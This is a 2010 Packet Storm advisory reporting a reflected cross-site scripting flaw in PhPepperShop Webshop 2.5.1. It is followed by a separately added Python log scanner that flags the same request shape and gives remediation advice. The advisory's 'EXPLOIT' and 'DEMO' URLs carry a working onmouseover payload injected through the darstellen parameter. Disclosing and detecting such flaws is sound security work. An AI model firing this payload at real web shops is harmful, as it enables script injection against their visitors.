packetstorm | Crux | PACKETSTORM:85029
History: Jan 12, 2010 - 12:00 a.m.

PhPepperShop Webshop 2.5 Cross Site Scripting

packetstormsecurity.com
`  
  
==============================================================================  
[~] PhPepperShop Webshop 2.5 (XSS) Cross Site Scripting Vulnerability  
==============================================================================  
[+] My home [ http://hack-tech.com ]  
[+] Date Submitted: [ January 12 2010 ]  
[+] Founder: [ Crux ]  
[+] Vendor: [ http://www.phpeppershop.com/ ]  
[+] Version: [ 2.5.1 ]  
[+] Greetz: [ HT Team, All Maldivians and my love <3 ]  
[+] Dork: [ NO NO NO! ]  
###############################################################################  
  
[ EXPLOIT ]  
  
[Path]/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971  
  
  
[ DEMO ]  
  
http://site.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971  
  
==============================================================================  
  
  
###############################################################################  
~ There is no right and wrong, There's only fun and boring. :-) ~ Crux  
###############################################################################  
  
  
  
  
  
`
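
A defender-side check for the request shape shown in this advisory, added here as an example and not part of the original advisory or of PhPepperShop's code: it scans access-log lines for a decoded query value in which a quote is followed by an inline `on*=` event handler. The log lines are constructed, and treating `darstellen`, `lowlimit`, `highlimit`, `w` and `h` as numeric is an assumption drawn from the values in the advisory's URL.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Optional backslash, a quote, then an inline event-handler attribute such as
# onmouseover= : the attribute break-out shape of the advisory's request.
ATTR_BREAKOUT = re.compile(r"""\\?["'][\s/]*on[a-z]+\s*=""", re.IGNORECASE)
# Assumption: these parameters are numeric, judging by the advisory's URL.
NUMERIC_PARAMS = {"darstellen", "lowlimit", "highlimit", "w", "h"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
HANDLER = "quote followed by on*= handler"
NON_NUMERIC = "non-numeric value in numeric parameter"

def suspicious_params(request_target):
    """Return [(param, reason)] for decoded query values that look injected."""
    findings = []
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if ATTR_BREAKOUT.search(value):
            findings.append((name, HANDLER))
        elif name in NUMERIC_PARAMS and not value.strip().isdigit():
            findings.append((name, NON_NUMERIC))
    return findings

def scan_access_log(lines):
    """Return [(line_number, findings)] for log lines with flagged parameters."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        findings = suspicious_params(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample lines (documentation addresses, not real traffic).
PAGE = "/shop/USER_ARTIKEL_HANDLING_AUFRUF.php"
SAMPLE_LOG = [
    f'192.0.2.10 - - [12/Jan/2010:10:00:01 +0000] "GET {PAGE}?darstellen=1&Suchstring=onion+soup HTTP/1.1" 200 5120',
    f'192.0.2.77 - - [12/Jan/2010:10:00:09 +0000] "GET {PAGE}?darstellen=1%22+onmouseover%3Dalert(1)+&lowlimit=0 HTTP/1.1" 200 5187',
    f'192.0.2.77 - - [12/Jan/2010:10:00:12 +0000] "GET {PAGE}?darstellen=1\\"+onmouseover%3Dalert(1)+&lowlimit=0 HTTP/1.1" 200 5187',
]

if __name__ == "__main__":
    for number, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {findings}")
```

The pattern match is a triage signal for log review; the fix on the application side is to validate the numeric parameters and HTML-encode any value echoed into an attribute.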